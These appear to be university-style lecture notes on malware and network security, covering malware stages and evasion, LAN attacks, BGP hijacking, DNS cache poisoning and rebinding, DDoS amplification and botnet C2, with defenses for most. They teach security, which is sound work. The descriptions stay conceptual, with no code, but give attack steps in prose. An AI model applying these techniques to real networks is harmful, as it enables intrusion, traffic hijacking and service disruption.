Last update: Fri Apr 25 17:46:45 EDT 2025

Malware

Malware is software intentionally designed to cause harm to computers, networks, or users. It can steal data, damage systems, hijack devices, or spy on users. Common forms of malware include viruses, worms, Trojans, ransomware, spyware, adware, and rootkits. Malware typically operates without the user’s knowledge and may enter systems through vulnerabilities, social engineering, or compromised hardware.

Worms and Viruses

Understanding the distinction between worms and viruses helps clarify how malware spreads and how defenses must respond. Although both are self-replicating, they follow fundamentally different mechanisms for propagation. Worms spread autonomously by exploiting network vulnerabilities, requiring no user interaction. Viruses, in contrast, rely on user actions and attach themselves to legitimate files or programs, spreading only when these files are executed.

Core Components of Malware

Malware is often structured into functional stages that reflect its life cycle inside a target system. By breaking down these components, we can better understand how malware infiltrates, persists, communicates, and executes its objectives. Malware is often built as a multi-stage system. Each stage plays a role in enabling, maintaining, and concealing the attack.

Delivery (initial access)

Malware reaches a system via email attachments, malicious websites, infected USB drives, or software exploits. This is the point of initial access.

Installation (persistence)

To persist on the system, malware may alter startup settings, inject itself into running processes, or manipulate the registry.

Command and Control (C2)

Many malware families connect to external servers to receive instructions, send stolen data, or download updates.

Payload Execution

The payload is the malicious task executed by the malware, such as stealing data, logging keystrokes, or encrypting files.

Triggers

Malware may lie dormant until activated by a condition, such as a time, command, or system event, to avoid detection.

Exploiting Vulnerabilities

One powerful technique malware uses to gain control is exploiting software or configuration vulnerabilities. These weaknesses in software or hardware allow attackers to bypass security mechanisms and execute unauthorized code.

Zero-Day Exploits

Zero-day exploits target vulnerabilities that are unknown to the software vendor and have not yet been patched. Because no fix exists, these exploits are highly valuable and effective, especially for attackers who want to maintain stealth. Zero-day vulnerabilities are often discovered by security researchers, criminal organizations, or state-sponsored actors. They may be sold on black markets or used in targeted attacks before being disclosed. Once a zero-day is made public or used in a widespread attack, defenders have zero days to respond – hence the name. These exploits often form the initial step in sophisticated malware campaigns, especially against high-value targets.

N-Day Exploits

N-day exploits take advantage of known vulnerabilities for which patches have already been released. The term “N-day” refers to the number of days since the vulnerability was disclosed. Although a fix is available, many systems remain unpatched due to delays in updates, system compatibility concerns, or neglect. Attackers scan for these exposed systems and exploit them using publicly available tools or reverse-engineered patch information. N-day exploits are a common part of broad-based malware campaigns, since they allow attackers to compromise large numbers of systems with relatively low effort.

Zero-Click Exploits

These require no user interaction. Simply receiving a message or file can trigger the attack, often in messaging apps or file viewers.

Malware Activities

Once malware gains a foothold, it can perform various actions depending on its design and purpose. These activities may be stealthy or destructive, short-lived or persistent, targeted or indiscriminate.

Exfiltration

Malware may steal documents, credentials, emails, or other sensitive data and transmit them to an attacker.

Surveillance

Spyware records browsing, typing, communication, and sometimes webcam or microphone input.

Keylogging

Keyloggers capture user input to steal passwords and sensitive information.

Ransomware

Ransomware encrypts data or locks devices, demanding payment for restoration. Some variants also steal data.

Data Wiping

Wipers destroy data, rendering recovery impossible. Often used for sabotage.

Adware

Adware floods the user with advertisements and may track user behavior for profit.

Resource Abuse

Malware may use system resources for unauthorized purposes, such as cryptomining or participating in botnets.

Remote Control Remote Access Trojans (RATs) enable attackers to manipulate the system, install further malware, and monitor users.

Infiltration Techniques

Malware must first gain access to a target system. This section examines the diverse tactics attackers use to deliver and activate malware on unsuspecting victims’ devices. Malware must first gain access to the system. Techniques include exploiting flaws or deceiving users.

File Infector Viruses

File infector viruses attach themselves to executable files such as .exe, .com, or .dll files. When the infected file is run, the virus executes first, often launching the legitimate program afterward to avoid detection. These viruses can replicate by infecting other executable files on the system or shared drives. Some variants spread across network shares or removable media, embedding themselves into system files. File infector viruses may be destructive, corrupting or deleting files, or stealthy, silently spreading and delivering payloads such as spyware or ransomware. Because they modify existing programs, they can be difficult to detect without hashing or integrity-checking mechanisms.

Infected Flash Drives

Infected USB drives are a practical and dangerous malware delivery method, especially in environments with limited network exposure. On older Windows systems, attackers exploited AutoRun to automatically launch malware upon insertion. More sophisticated attacks modify the firmware of the USB device itself—a technique known as BadUSB. In this scenario, the device impersonates a keyboard and types malicious commands as soon as it’s plugged in, bypassing traditional security. USB drop attacks rely on human curiosity; attackers leave compromised drives in public places, hoping a target will plug one in. These drives may contain enticing filenames or documents (e.g., labeled as financial reports or photos), which activate malware when opened. Even when not infected, USB drives can cause data leakage if they contain sensitive files and are accessed by unauthorized users.

Code Exploits

Buffer overflows, command injection, and other software flaws allow attackers to run code without authorization.

Compromised Tools and Firmware

Malicious compilers or modified firmware can inject backdoors during compilation or device use. Ken Thompson’s Reflections on Trusting Trust reminds us that tools like compilers can be modified to enable undetectable backdoors even in secure-looking software.

Social Engineering

Attackers often bypass technical defenses by targeting the human element. Social engineering is the practice of manipulating people into performing actions that compromise security, such as installing malware or revealing sensitive information. These techniques are often delivered through familiar interfaces, such as emails, websites, pop-ups, and text messages – and rely on urgency, curiosity, fear, or trust to deceive users. Users may be tricked into installing malware through misleading emails, fake software, or deceptive prompts.

Credential Stuffing

Attackers reuse leaked credentials to gain access to other systems where users have reused passwords.

Supply Chain Attacks

Malware can be inserted during software development or distribution. This includes tampered installers, compromised libraries, or poisoned updates. Examples include the SolarWinds breach and the 2024 xz Utils backdoor.

Macro Viruses

These are embedded in documents using scripting languages like VBA (Visual Basic for Applications) or embedded JavaScript in PDF documents. Users are often tricked into enabling macros, which can lead to infection and replication across files.

Where Malware Resides

After infiltration, malware must remain accessible and persistent. It embeds itself in different parts of the system, often choosing locations that are hard to inspect or clean. Malware hides in many layers of the system to maintain access and evade detection.

Boot Sector and Bootloader

Bootkits infect the system before the OS loads, making removal difficult.

Backdoors

Backdoors are covert access points that bypass normal authentication mechanisms, granting attackers unauthorized entry into a system. They may be introduced during software development, inserted by insiders, or installed post-compromise by malware. Once in place, backdoors allow attackers to return to the system without re-exploiting vulnerabilities. They can be implemented as hardcoded credentials, hidden administrative tools, or malware components that listen for specific commands. Backdoors are often difficult to detect because they blend in with legitimate software or remain dormant until triggered.

Remote Access Trojans (RATs)

Remote Access Trojans (RATs) are a class of malware designed to provide attackers with complete remote control over an infected system. Once a RAT is installed, the attacker can access files, monitor user activity, use the webcam or microphone, capture keystrokes, and deploy additional malware. RATs are typically delivered via phishing emails, trojanized software, or drive-by downloads. They often include features to hide from detection, such as encryption, polymorphism, and rootkit components. RATs are especially dangerous because they give attackers persistent and interactive access, enabling long-term surveillance or sabotage.

Rootkits

Rootkits are stealthy software components designed to conceal the presence of malware by altering how the operating system functions. They may hide files, processes, registry entries, or network activity associated with the malicious software. Rootkits can operate in user mode, affecting high-level OS utilities, or in kernel mode, modifying core operating system behavior. Hypervisor rootkits go even deeper, running below the OS to gain complete control over the system while remaining nearly invisible. Because rootkits interfere directly with system operations, they are difficult to detect and remove, often requiring specialized forensic tools or complete system reinstallation.

Hypervisor Rootkits

Hypervisor rootkits are an advanced form of rootkit that operates at an even lower level than the operating system by inserting itself as a hypervisor between the hardware and the operating system. By controlling the hypervisor, the rootkit can intercept and manipulate all operations performed by the operating system, making its presence virtually invisible to the system and security tools running inside it.

Unlike kernel-mode rootkits that modify the operating system itself, hypervisor rootkits allow the original operating system to continue functioning normally while subtly altering its behavior from underneath. They can intercept system calls, hide files and processes, or modify data without being detected by conventional security tools. Hypervisor rootkits typically exploit hardware virtualization features and require an initial compromise to install, often by exploiting vulnerabilities that allow privileged code execution.

Detection of hypervisor rootkits is extremely difficult because the compromised OS has no reliable way to examine the hypervisor controlling it. Specialized forensic techniques or hardware-level integrity checking are often required to detect or remove them.

Fileless Malware

Fileless malware operates from memory or the registry, avoiding disk writes and evading traditional antivirus detection.

Social Engineering

Attackers often bypass technical defenses by targeting the human element. Social engineering is the practice of manipulating people into performing actions that compromise security, such as installing malware or revealing sensitive information. These techniques are often delivered through familiar interfaces—emails, websites, pop-ups, text messages—and rely on urgency, curiosity, fear, or trust to deceive users.

Trojans

‘Trojan’ is short for ‘Trojan Horse,’ referring to the ancient tale where attackers hid inside a giant horse, which was presented as a seemingly harmless gift. In computing, a Trojan horse is a malicious program disguised as legitimate software, intended to deceive the user into installing it.

The user is tricked into downloading and installing the Trojan, believing it serves a beneficial function. Once installed, the Trojan silently executes harmful actions, such as installing spyware, opening backdoors, or granting remote access. Trojans may appear as system utilities, games, updates, or cracked software. Some are embedded within seemingly legitimate downloads from file-sharing sites or phishing emails, and others are bundled with fake security tools.

Phishing

Phishing is a form of fraud that uses deceptive communication, usually email, to trick users into taking unsafe actions, such as clicking on malicious links or providing login credentials. These messages often impersonate legitimate sources like banks, cloud services, or internal IT teams. While generic phishing messages are broadly distributed, more advanced forms include spear phishing and smishing.

Spear phishing targets a specific individual or organization using personalized information to appear credible. For example, a message may reference a project the user is working on or appear to come from a trusted colleague. This makes it far more convincing and harder to detect.

Smishing is phishing delivered through SMS or messaging apps. Victims may receive urgent texts claiming to be from a bank, delivery service, or administrator, prompting them to click a malicious link or enter credentials on a spoofed site. These attacks are especially dangerous on mobile devices, where it is harder to verify links or sender identities.

Deceptive Pop-Ups

Fake alerts trick users into running code or downloading files.

Fake Websites and Links

Malicious websites may look legitimate or use typosquatting to deceive users. Masked links also hide the true destination.

QR Code Attacks

Malicious QR codes can link to phishing pages or trigger unintended downloads.

Information Gathering Techniques

Some malware is designed to quietly collect sensitive information over time. These techniques allow attackers to monitor systems without drawing attention. Some malware gathers information passively over time.

Keyloggers

Capture user keystrokes to extract sensitive information.

Side-Channel Attacks

Side-channel attacks extract sensitive information by analyzing indirect data produced by a system, such as electromagnetic emissions, power consumption, timing variations, or acoustic signals. Unlike traditional attacks that exploit software vulnerabilities, side-channel attacks take advantage of physical or behavioral characteristics of a system. For example, attackers may observe CPU power fluctuations to infer encryption keys, or use variations in typing sounds to reconstruct text input. These attacks are especially dangerous in high-security environments where systems are otherwise locked down.

Side-channel techniques can be embedded in malicious software to quietly exfiltrate data over non-traditional channels. For instance, malware might encode data in blinking LEDs, fan speed fluctuations, or even inaudible sound signals. Because these channels fall outside typical monitoring systems, side-channel attacks are hard to detect and often go unnoticed. They are especially useful in air-gapped environments (systems not connected to external networks), where conventional data exfiltration via networks is not possible.

Botnets and Control

Some malware converts infected systems into remotely controlled bots. Coordinated botnets can perform large-scale operations and are often managed via command-and-control (C2) infrastructure.

A bot is an infected device under an attacker’s control. Botnets consist of many bots coordinated to perform large-scale actions like DDoS attacks, spamming, or mining cryptocurrency. Bots receive commands via C2 infrastructure.

Defending Against Malware

Effective malware defense involves a combination of prevention, detection, and response. This section outlines several strategies that reduce the risk and impact of infections. Protection requires layered defenses combining technical controls and user awareness.

File and Access Control

Restrict what users and programs can access. Use Mandatory Access Control (MAC) and the principle of least privilege.

User Warnings

Warnings before running unknown content help prevent accidental execution of malware. Training helps users interpret and respond appropriately.

Anti-Malware Technologies

Anti-malware technologies use a combination of static and dynamic techniques to detect and block malicious software.

Signature-based scanning is one of the most traditional and widely used methods. It involves scanning files for known byte patterns that uniquely identify malware. This technique is fast and effective against previously identified threats, but cannot detect new or modified malware that lacks a known signature.

Heuristic analysis uses rules and pattern recognition to identify suspicious behaviors or characteristics common to malware, even if the code itself is unknown. Static heuristics examine code structure without executing it, while behavioral analysis, or dynamic heuristics, monitors how a file acts when executed. Behavioral analysis can detect malware that tries to evade static scanning by observing actions like unusual file access, system changes, or network communication. These techniques are especially useful for detecting zero-day threats or polymorphic malware that changes its appearance to avoid signature detection.

System Hardening

Removing administrative rights, isolating risky applications, and using containerization limit malware impact.

Malware Evasion Strategies

Modern malware uses evasion techniques to bypass defenses and remain undetected. These strategies range from encryption and obfuscation to conditional execution and stealthy communication.

Encryption

Malware may encrypt its contents to avoid detection by signature scanners.

Packing

Packing is a technique used to obfuscate malware by compressing or encrypting the code so that its true nature is hidden from signature-based scanners. The packed executable contains a small stub program that decompresses or decrypts the original malicious code in memory at runtime. Packers are commonly used by malware authors to make reverse engineering and analysis more difficult. Many commercial packers are legitimate tools used for software protection, but they are frequently abused in malware distribution. Security tools must often unpack the file or emulate its execution to detect the real payload.

Polymorphism

Polymorphic malware modifies its own code with each infection, creating unique signatures while preserving functionality. This is typically achieved through code obfuscation, encryption with variable keys, or insertion of junk instructions that don’t change the algorithm (such as no-ops). The mutation occurs every time the malware replicates or installs itself, making it difficult for traditional signature-based detection tools to identify. Some polymorphic engines are highly advanced, capable of generating millions of variants. This ability to change appearance while maintaining behavior is especially effective at evading static detection mechanisms.

Delayed Execution

Some malware delays its execution until certain conditions are met, such as the passage of time, detection of specific user behavior, or receipt of a remote command. This strategy helps avoid detection during automated sandbox analysis, which typically only observes programs for a short duration. Delayed execution allows the malware to remain dormant until it is less likely to be analyzed or intercepted.

Many advanced malware variants also include checks to determine whether they are running in a virtual machine or sandboxed environment, which are commonly used by security researchers. These checks might involve detecting the presence of analysis tools, unusual hardware configurations, or short uptimes. If such an environment is detected, the malware may choose to disable itself, exit quietly, or exhibit benign behavior to avoid exposure. By withholding its malicious behavior until it confirms it is on a real user system, the malware greatly reduces its chance of detection during early stages of analysis.

Covert Channels

Covert channels are unconventional methods used by malware to communicate or exfiltrate data in ways that bypass standard security monitoring tools. These channels are not designed for data transmission and often repurpose benign or obscure system features. One common example is DNS tunneling, where malware encodes data into DNS queries or responses to covertly send or receive information from a command-and-control server. Because DNS is a fundamental service that is rarely blocked, it offers an effective and persistent communication path.

Other covert channels may involve encoding data in network packet timing, unused header fields, or even through system artifacts such as LED blink patterns, sound, or CPU usage patterns. These methods are particularly useful in environments with tight security controls or where outbound internet access is restricted. By hiding communication within normal system operations, covert channels help malware remain undetected while continuing to exfiltrate sensitive information or receive instructions.

Trusting Trust

Ken Thompson’s essay reminds us that tools like compilers can be malicious, enabling undetectable backdoors even in secure-looking software.

Honeypots

Honeypots are deliberately vulnerable systems used to attract and monitor attackers. They serve as valuable tools for research, detection, and diversion in cybersecurity operations. Honeypots are decoy systems designed to attract attackers. They allow defenders to study attack behavior and delay adversaries while protecting real systems.

Network Security

The Internet is designed to interconnect various networks, each potentially using different hardware and protocols, with the Internet Protocol (IP) providing a logical structure atop these physical networks. IP inherently expects unreliability from underlying networks, delegating the task of packet loss detection and retransmission to higher layers like TCP or applications. Communication via IP involves multiple routers and networks, which may compromise security due to their unknown trust levels.

The OSI model helps describe the networking protocol stacks for IP:

1. Physical Layer: Involves the actual network hardware.
2. Data Link Layer: Manages protocols for local networks like Ethernet or Wi-Fi.
3. Network Layer: Handles logical networking and routing across physical networks via IP.
4. Transport Layer: Manages logical connections, ensuring reliable data transmission through TCP, or provides simpler, unreliable communication via UDP.

Each layer plays a critical role in ensuring data is transmitted securely and efficiently across the internet.

Data link layer

In Ethernet and Wi-Fi networks, the data link layer governs how devices communicate over a local link. Ethernet uses physical cables and switches, while Wi-Fi uses radio signals and access points. This layer relies on MAC (Media Access Control) addresses for local delivery. Security was not a design priority for the data link layer, making it vulnerable to several attacks. Notably, Wi-Fi includes encryption, but only between the client device and the access point, not end-to-end between communicating hosts.

Switch CAM table overflow

Intercept traffic by forcing the switch to behave like a hub.

Switches maintain a Content Addressable Memory (CAM) table that maps MAC addresses to physical switch ports, enabling efficient packet delivery. A CAM table overflow attack floods the switch with packets from bogus MAC addresses, exceeding the table’s capacity. When the table is full, the switch fails open, broadcasting all frames to all ports. This behavior allows an attacker to passively monitor all traffic on the LAN.

To defend against this, port security features on managed switches can limit the number of allowed MAC addresses per port. Additional countermeasures include enabling 802.1X authentication to restrict access until devices are verified.

VLAN hopping (switch spoofing)

Access traffic across multiple VLANs by impersonating a switch.

Virtual Local Area Networks (VLANs) segment network traffic to improve performance and security. VLAN trunking, using IEEE 802.1Q tagging, allows traffic from multiple VLANs to traverse a single switch-to-switch link. In a VLAN hopping attack, an adversary mimics a switch by initiating a trunk connection. This switch spoofing tricks the real switch into forwarding traffic from all VLANs to the attacker’s device.

Defense involves explicitly configuring trunk ports on managed switches and disabling automatic trunk negotiation on access ports. This ensures only authorized ports carry multi-VLAN traffic.

ARP cache poisoning

Redirect IP packets by changing the IP address to MAC address mapping.

The Address Resolution Protocol (ARP) resolves IP addresses to MAC addresses on a local network. In ARP cache poisoning, an attacker sends forged ARP responses, often unsolicited, to associate their MAC address with another host’s IP. As a result, traffic meant for the victim is misrouted to the attacker, enabling man-in-the-middle interception or denial of service.

Mitigation strategies include:

• Dynamic ARP Inspection: Validates ARP packets against a trusted DHCP snooping database.
• Static ARP entries: Hardcode legitimate IP-to-MAC mappings on critical systems, though this is difficult to manage at scale.

DHCP spoofing

Deceive new devices by supplying malicious network settings.

Dynamic Host Configuration Protocol (DHCP) assigns IP addresses and other configuration settings to clients joining a network. In a DHCP spoofing attack, an attacker races to respond faster than the legitimate server, providing rogue settings such as a malicious DNS server or default gateway. This can lead to traffic interception, redirection, or disruption.

To counter this, DHCP snooping is used on managed switches. It classifies ports as trusted or untrusted and allows DHCP responses only from trusted ports. Combined with ARP inspection, this ensures that clients receive configuration only from legitimate sources..

Network (IP) layer

The Internet Protocol (IP) provides packet delivery across interconnected networks. It offers best-effort delivery, meaning it does not guarantee packet reliability, integrity, or delivery order. Packets can be dropped due to router queue overflows or may arrive out of order after taking different routes to their destination.

Source IP address authentication

Anyone can impersonate a sender.

One fundamental weakness in IP is the absence of source IP address authentication. Operating systems expect applications to use their real source IP address, but privileged users can override this using raw sockets. This allows attackers to forge packets that appear to come from another host. Any service that relies on IP address-based authentication, such as access controls or rate limits, can be subverted.

Anonymous denial of service

Use spoofed IP addresses to reflect error responses toward a victim.

Attackers can perform anonymous denial of service (DoS) by sending packets with spoofed source addresses that trigger error messages. For example, if a packet with a low Time-To-Live (TTL) expires en route, routers send ICMP Time Exceeded responses to the (forged) source address. A large-scale attack using many spoofed packets from distributed machines (a botnet) can generate significant traffic aimed at a target, effectively overwhelming it without revealing the attacker’s location.

Routers

Routers are specialized computers that forward packets between networks using routing tables and often dedicated forwarding hardware. Despite their importance, they are frequently neglected in terms of security. Routers may use default credentials, run outdated firmware, or expose administrative interfaces.

Routers are susceptible to many of the same threats as general-purpose computers. DoS attacks, such as floods of ICMP packets, can overwhelm routing functions. Improper input handling may lead to crashes or corruption from malformed packets.

More critically, attackers can manipulate routing paths through route table poisoning, either by compromising the router itself or injecting forged route advertisements if routing protocols lack authentication.

Transport layer (UDP, TCP)

Transport layer protocols enable applications to exchange data across networks using port numbers (16-bit values independent of Ethernet switch ports) to identify application endpoints.

UDP

The User Datagram Protocol (UDP) is connectionless and does not maintain state between packets. It offers no guarantee of delivery, ordering, or authenticity. Like IP, it is susceptible to spoofing, making it a common vector for reflection attacks and simple DoS techniques.

TCP

The Transmission Control Protocol (TCP) provides reliable, ordered, and connection-oriented communication. TCP uses sequence numbers to track data and ensure integrity. Connections are established via a three-way handshake:

1. The client sends a SYN packet with a random initial sequence number.
2. The server replies with a SYN-ACK, acknowledging the client’s sequence number and providing its own.
3. The client responds with an ACK, completing the handshake and beginning data transfer.

To mitigate spoofing and hijacking, TCP uses random initial sequence numbers, making it harder for attackers to guess valid sequence numbers and inject forged packets.

SYN flooding

In a SYN flooding attack, an attacker sends many SYN packets but never completes the handshake. The server allocates resources for each half-open connection, eventually exhausting its capacity.

To defend against this, servers use SYN cookies: instead of storing state, the server encodes necessary connection information into the initial sequence number. When the client replies with an ACK, the server validates the cookie before allocating resources, protecting against resource exhaustion.

TCP Reset

Attackers can forcibly terminate a TCP session by injecting a forged RST (reset) segment. If the sequence number in the forged packet is close to the expected value, the receiving host may accept it and tear down the connection.

While the theoretical chance of guessing the exact 32-bit sequence number is extremely low (1 in 2³²), many systems tolerate a window of acceptable sequence numbers to accommodate out-of-order packets. Attackers can exploit this by flooding the target with RST packets using sequence numbers that fall within this range. If successful, the connection is prematurely closed, disrupting communication.

Routing Protocols

The Internet is composed of many independently operated networks known as Autonomous Systems (AS). Each AS manages a group of IP addresses and uses internal routing protocols to move traffic within its domain. To route traffic between autonomous systems, the Internet relies on the Border Gateway Protocol (BGP). BGP enables external routers at each AS to exchange reachability information and determine the best path for forwarding packets across the global network. It is fundamental to Internet routing but was designed with minimal built-in security, relying heavily on trust among network operators (and there are over 82,000 active ones).

BGP Hijacking

BGP hijacking (or route hijacking) occurs when a network falsely claims ownership of IP prefixes it does not control, misleading other networks into routing traffic through the attacker’s system. This allows for traffic interception, man-in-the-middle attacks, packet inspection, or denial of service.

In BGP, a prefix is a block of IP addresses represented by a network address and a mask, indicating which IP addresses are reachable through a given route. For example 192.0.2.0/24 identifies a range of IP addresses where the first 24 bits correspond to 192.0.2.

There are two common subtypes of BGP hijacking:

BGP Path Forgery: The attacker manipulates the AS path in BGP advertisements to appear as a legitimate route. Because BGP lacks path validation, other networks may accept these announcements and route traffic through the attacker’s AS.

BGP Prefix Forgery: The attacker advertises a more specific prefix (e.g., a /24 instead of a legitimate /22). BGP prioritizes more specific routes, so this method effectively diverts traffic to the attacker, even if the destination address is legitimately owned by another AS.

Both methods exploit BGP’s design, which assumes honest cooperation among participants and lacks cryptographic verification of routing announcements.

Defending Against BGP Hijacking

To address these vulnerabilities, two major security enhancements have been proposed:

RPKI (Resource Public Key Infrastructure): RPKI allows IP address holders to cryptographically sign Route Origin Authorizations (ROAs) that specify which AS is permitted to announce specific prefixes. Routers can validate BGP announcements against these signed ROAs to reject forged origin claims. However, RPKI adoption remains incomplete, and misconfigured ROAs can unintentionally block valid traffic.

BGPsec: BGPsec extends BGP by enabling cryptographic validation of the entire AS path. Each AS adds a digital signature to the routing update, allowing downstream routers to verify the path’s integrity. While BGPsec significantly improves security, it introduces high computational overhead and requires all participating ASes to adopt the protocol for full effectiveness. Adoption has been slow due to the complexity of implementation and compatibility concerns.

Domain Name System (DNS)

The Domain Name System (DNS) is a hierarchical service that maps human-readable domain names (like example.com) to IP addresses. It is fundamental to the operation of the Internet, as most services rely on name-based addressing.

Each device typically runs a DNS stub resolver, which performs lookups as follows:

1. It first checks a local file (e.g., hosts) for predefined mappings.
2. Then it checks its local DNS cache.
3. If no match is found, it sends a query to an external resolver, typically provided by an ISP or a public DNS service like Google Public DNS or OpenDNS.

DNS is inherently trusted: applications, including web browsers, rely on DNS for enforcing the same-origin policy, which governs what content can be shared between web pages. However, standard DNS uses UDP, with no built-in authentication or integrity. The only validation is a Query ID (QID) field used to match responses to queries. Because DNS queries and responses are unauthenticated, they can be intercepted, modified, or spoofed.

To address these issues, DNSSEC (DNS Security Extensions) was introduced. DNSSEC allows responses to be digitally signed, enabling clients to verify their authenticity. However, deployment remains limited due to complexity, larger response sizes, and compatibility challenges.

Pharming Attack

A pharming attack manipulates DNS resolution to redirect a victim’s traffic to a malicious destination. This can be done in several ways:

• Modifying the local system’s hosts file to insert malicious name-to-IP mappings.
• Changing the DNS server configuration (e.g., via malware or rogue DHCP responses), causing the system to use an attacker-controlled DNS server.
• Compromising legitimate DNS servers and altering the records they return.

By corrupting DNS resolution at the source, attackers can transparently redirect users to malicious sites without altering URLs or requiring user interaction.

DNS Cache Poisoning (DNS Spoofing)

A DNS cache poisoning attack corrupts the resolver’s cache with forged responses, leading to persistent redirection of traffic to malicious addresses.

A common variant leverages JavaScript in a malicious webpage to repeatedly trigger DNS queries for non-existent subdomains (e.g., a.bank.com). These queries prompt a legitimate DNS resolver to issue requests for the unknown subdomain. Simultaneously, the attacker floods the resolver with spoofed responses, each containing a different random Query ID and pointing to a rogue DNS server for the target domain (e.g., bank.com). If a spoofed response has a matching QID, the resolver accepts it and caches the malicious DNS server as authoritative for the domain. All future queries for bank.com and its subdomains will be redirected.

If the attempt fails, the attacker simply repeats it with a new subdomain (b.bank.com, c.bank.com, etc.), increasing the odds of success.

Summary: Attackers forge DNS responses with random query IDs in the hope that one matches an active query. A successful match poisons the cache, redirecting future queries to attacker-controlled IP addresses.

DNS Rebinding

DNS rebinding is a browser-based attack that exploits the same-origin policy by manipulating DNS resolution.

Here’s how it works:

1. The attacker registers a domain (e.g., attacker.com) and sets up a DNS server.
2. The domain’s DNS record is configured with a short TTL, allowing rapid updates.
3. The victim visits a malicious webpage at attacker.com, which loads JavaScript.
4. Because the script is from the same origin (attacker.com), it can make requests back to the domain.
5. The attacker’s DNS server quickly changes the IP address for attacker.com to an internal IP (e.g., 192.168.1.1).
6. The JavaScript, still considered to be from the same origin, now gains access to internal systems.

Summary: By quickly changing a domain’s resolved IP address after a script is loaded, attackers can bypass same-origin restrictions and access internal network resources.

Distributed Denial of Service (DDoS) Attacks

A Distributed Denial of Service (DDoS) attack aims to make a service unavailable by overwhelming it with traffic from many sources. These attacks can target servers, applications, or entire networks, making them inaccessible to legitimate users. Motivations range from extortion and political activism to cover for data breaches or simply disrupting services.

DDoS attacks often leverage botnets. These are networks of compromised devices called zombies, which are remotely controlled by a command and control (C&C) server. Each zombie can generate traffic, and the distributed nature of these attacks makes mitigation difficult.

Techniques Used in DDoS Attacks

Attackers commonly use the following techniques:

1. Exploiting Asymmetry: Target systems where handling requests (e.g., complex queries or SSL handshakes) is far more resource-intensive than sending them.
2. Spoofing Source Addresses: Hide the origin of traffic and avoid replies by using fake source IPs.
3. Reflection: Send spoofed requests to third-party servers, which reply to the victim.
4. Amplification: Use services that respond with far more data than they receive, multiplying the effect.
5. Botnets: Coordinate thousands or millions of devices to generate massive traffic.

Forms of Overwhelming a Target

• Volumetric Attacks: Exhaust bandwidth by flooding with high data volumes (e.g., measured in Tbps).
• Packet-per-Second (PPS) / Request-per-Second (RPS) Attacks: Overload processing capacity by sending small packets or HTTP requests at a high rate.
• Application-Layer Loops: Abuse certain UDP protocols (e.g., TFTP, DNS) to cause endless response loops between misconfigured servers.

Reflection and Amplification Attacks

Reflection amplification attacks are a powerful and efficient DDoS technique that allows an attacker to direct large volumes of traffic at a target using minimal resources. The core idea is to exploit intermediary servers—typically public, UDP-based services—to act as unwitting amplifiers.

Because UDP is connectionless and doesn’t validate sender addresses, attackers can spoof the victim’s IP as the source. The service replies to the victim with a response that is often far larger than the original request, amplifying the traffic volume.

Amplification is an appealing technique fr several reasons:

• Efficiency: A small spoofed request can generate a massive response, sometimes over 50,000 times larger, allowing an attacker to create a huge data flood with little effort.

• Anonymity: The attacker spoofs the source IP address to make it appear as though the target initiated the request. This obscures the attack’s true origin, making it extremely difficult to trace.

• Evasion: Since responses come from legitimate servers, filtering traffic based on source IPs becomes challenging.

• Global scale: The use of distributed public servers spreads out the load, bypassing bandwidth limitations on the attacker’s side.

Amplification factors vary by service:

For example, a 60-byte DNS query for “ANY” records can produce a 3,500-byte response (_58× amplification).

Botnets and Command & Control

A botnet is a distributed network of infected devices under the control of a command & control (C&C) server. Each device, or zombie, waits for instructions from the C&C server to begin an attack. Botnets are often built using malware like Mirai, which targets IoT devices with default credentials.

Botnets are difficult to detect and block because:

• Traffic originates from many IP addresses and regions.
• The attack doesn’t come from a single identifiable source.
• Many devices may be legitimate hosts unwittingly participating.

In addition to overwhelming targets with traffic, botnets must maintain control and coordination. This is typically achieved through a command and control (C&C) infrastructure, which sends instructions to infected devices (zombies) and receives updates in return.

To evade detection and bypass firewalls or intrusion detection systems, botnets often employ covert communication techniques, such as:

DNS Tunneling: Botnets encode commands or data into DNS queries or responses. Since DNS traffic is widely allowed through firewalls and rarely inspected closely, it offers a discreet channel for communication. For example, a bot might send a query like cmd123.attacker.com, where the subdomain encodes a command, and the DNS server under attacker control interprets and responds with encoded data.

Encrypted C&C Channels: Botnets may also use HTTPS or custom encrypted protocols over standard ports (e.g., TCP 443) to hide C&C traffic in normal web flows.

By hiding command traffic inside benign-looking or commonly allowed protocols like DNS, botnets can persist in networks for long periods without detection, while continuing to receive commands or exfiltrate data.

Defensive Strategies

Network-Level Defenses

• Rate Limiting: Limit how many requests a client can make.
• Traffic Shaping: Prioritize essential traffic; deprioritize or throttle UDP.
• Traffic Filtering: Block packets with suspicious source or destination ports/IPs.
• Blackhole Routing: Drop traffic to a victim IP entirely to protect infrastructure.
• IP Blacklisting: Block known bad IPs or regions.

Application-Level Defenses

• Web Application Firewalls: Inspect and filter HTTP/S traffic.
• CAPTCHAs: Block automated requests by requiring user interaction.
• Content Delivery Networks (CDNs): Offload traffic to edge servers. Companies that run CDNs, like Akamai or Amazon, have a huge number of load-balanced content servers distributed around the world across many ISPs. Even the largest DDoS attacks are unlikely to overwhelm them.

Participation Mitigation

• Disable Unused Services: Especially UDP-based services vulnerable to amplification.
• Monitor Traffic: Watch for unusual volumes from internal systems.
• Patch Exposed Servers: Keep systems like memcached or CLDAP secure and access-controlled.

Secure Communication: TLS and VPNs

Most communication over the internet traverses untrusted networks. Whether browsing a website, accessing cloud services, or connecting to a remote office, sensitive data is constantly exposed to potential interception, tampering, or impersonation unless it is properly protected.

Network security protocols are essential for defending data in transit. Two of the most important mechanisms for achieving this are Transport Layer Security (TLS) and Virtual Private Networks (VPNs). While both aim to secure communication, they operate at different layers of the network stack and serve different purposes.

TLS secures communication between individual applications, most commonly between web browsers and servers, by establishing a secure, authenticated session between two endpoints. It ensures that data exchanged in a single session remains private and unaltered.

VPNs operate at the network layer to create a secure tunnel between networks or devices. Once a VPN is established, all traffic between the two endpoints is encrypted and authenticated, regardless of which applications generate the traffic.

Transport Layer Security (TLS)

Transport Layer Security (TLS) is a cryptographic protocol that ensures secure communication between applications over an untrusted network. Originally derived from SSL (Secure Sockets Layer), TLS has become the standard for securing data exchanged over the internet. It protects against eavesdropping, tampering, and forgery.

TLS guarantees three essential security properties: authentication of the communicating server (and optionally the client), confidentiality of data through encryption, and integrity through cryptographic verification. These goals are achieved using a combination of public key cryptography for establishing trust and shared secrets, and symmetric cryptography for efficient data protection.

Design Goals and Evolution

TLS was created in response to the inherent insecurity of network-layer protocols, which offer no protection against packet inspection, modification, or injection. By encapsulating communication in a cryptographically secure session, TLS ensures that messages are confidential and authentic.

